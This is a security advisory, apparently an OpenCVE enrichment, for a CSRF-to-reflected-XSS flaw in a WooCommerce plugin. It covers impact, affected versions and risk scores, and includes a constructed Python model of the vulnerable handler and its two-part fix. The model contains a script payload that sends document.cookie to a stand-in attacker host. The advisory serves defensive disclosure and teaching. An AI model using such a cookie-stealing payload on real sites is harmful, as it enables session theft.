Impact
The vulnerability is a Cross-Site Request Forgery (CSRF) that chains into reflected Cross-Site Scripting (XSS): a request handler in the plugin neither verifies a nonce (request-origin token) nor sanitizes the input it reflects back into the page. An unauthenticated attacker who tricks a logged-in user into following a crafted link or submitting a crafted form causes the victim's browser to send the forged request with the victim's own session cookie attached; the plugin then reflects the attacker-controlled input unescaped, and the injected script runs in the victim's browser in the context of the site. That script can read cookies and other page content, deface the site, or perform actions on behalf of the victim. The weakness maps to CWE-352 (Cross-Site Request Forgery). The impact is a compromise of the confidentiality, integrity, and availability of the website and of any logged-in user who is successfully targeted.
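The two missing controls that produce this class of bug, and the fix for each, can be shown with a small self-contained model. The code below is an added illustration and is not the plugin's own code: the handler, the `pwfi_filter` action name, the `filter` and `_wpnonce` parameters, the session identifier and the payload are all constructed for the example. `create_nonce`/`verify_nonce` play the role that `wp_create_nonce()`/`wp_verify_nonce()` play in WordPress, and `html.escape` plays the role of `esc_html()`.

```python
"""Model of a CSRF-to-reflected-XSS condition and its two-part fix.

Added example, not code from the affected plugin. It shows why a forged
cross-site request succeeds against a handler that (1) never checks a
nonce and (2) reflects a parameter unescaped, and how each fix closes
one half of the chain. All names and data are constructed.
"""
import hashlib
import hmac
import html

SECRET_KEY = b"constructed-server-secret"  # stands in for the site's nonce salt


def create_nonce(session_id, action):
    """Per-session, per-action token (analogous in purpose to wp_create_nonce)."""
    msg = f"{session_id}|{action}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()[:16]


def verify_nonce(session_id, action, nonce):
    """Constant-time check of the token (analogous to wp_verify_nonce)."""
    if not nonce:
        return False
    return hmac.compare_digest(create_nonce(session_id, action), nonce)


def vulnerable_handler(request):
    """Reflects the 'filter' parameter verbatim and never checks a nonce.
    The browser attaches the victim's cookie to a cross-site request, so a
    URL crafted by an unauthenticated attacker is processed as the victim."""
    if not request.get("cookie"):
        return 403, "login required"
    value = request["params"].get("filter", "")
    return 200, f"<p>Products without images, filter: {value}</p>"


def hardened_handler(request):
    """Two independent fixes: reject requests lacking a valid per-session
    nonce (stops the CSRF), and HTML-encode the reflected value (stops the
    XSS even if a nonce-bearing request carries hostile input)."""
    session = request.get("cookie")
    if not session:
        return 403, "login required"
    if not verify_nonce(session, "pwfi_filter", request["params"].get("_wpnonce")):
        return 403, "invalid nonce"
    value = html.escape(request["params"].get("filter", ""), quote=True)
    return 200, f"<p>Products without images, filter: {value}</p>"


# Constructed victim session and attacker-controlled input.
VICTIM_SESSION = "sess-admin-42"
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def forged_request():
    """What the victim's browser sends after following the attacker's link:
    the site cookie is attached automatically; no nonce is present."""
    return {"cookie": VICTIM_SESSION, "params": {"filter": PAYLOAD}}


def legitimate_request(value):
    """A request built by the plugin's own page, which carries the nonce."""
    return {
        "cookie": VICTIM_SESSION,
        "params": {"filter": value,
                   "_wpnonce": create_nonce(VICTIM_SESSION, "pwfi_filter")},
    }


def script_reflected(body):
    """True if the raw script tag survived into the response body."""
    return "<script>" in body


if __name__ == "__main__":
    status, body = vulnerable_handler(forged_request())
    print("vulnerable, forged:", status, script_reflected(body))
    status, body = hardened_handler(forged_request())
    print("hardened, forged:", status, body)
    status, body = hardened_handler(legitimate_request(PAYLOAD))
    print("hardened, valid nonce but hostile input:", status, script_reflected(body))
```

The point of keeping both fixes is that they fail independently: a nonce alone still leaves the reflection exploitable by anyone who can obtain a valid token (for example a low-privileged user on the same site), and escaping alone still leaves the state-changing side of the handler forgeable.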
Affected Systems
The flaw affects the WordPress plugin Softagon WooCommerce Products without Featured Images in all versions up to and including 0.1. The plugin runs on WordPress sites with WooCommerce installed, and the issue is independent of the theme or other plugins in use. Site owners can confirm the installed version from the plugin entry on the WordPress admin Plugins screen.
Risk and Exploitability
The CVSS score of 7.1 rates the flaw as high severity, while the EPSS score below 1% indicates a low probability of exploitation in the wild at this time, and the vulnerability is not listed in the CISA KEV catalog, so no known large-scale exploitation has been reported. The attack path follows from the CSRF nature of the flaw: the attacker does not need the victim's credentials or session, only to get a logged-in user to visit a crafted URL or page, after which the browser supplies the session cookie itself and the plugin reflects the injected script. Note that EPSS estimates exploitation probability across all exposed systems and says nothing about a targeted attack on a particular site. Given these conditions, the risk is moderate to high for sites where the plugin is active, especially for administrator accounts, but the actual likelihood of exploitation remains low unless automated or targeted CSRF campaigns pick it up.
OpenCVE Enrichment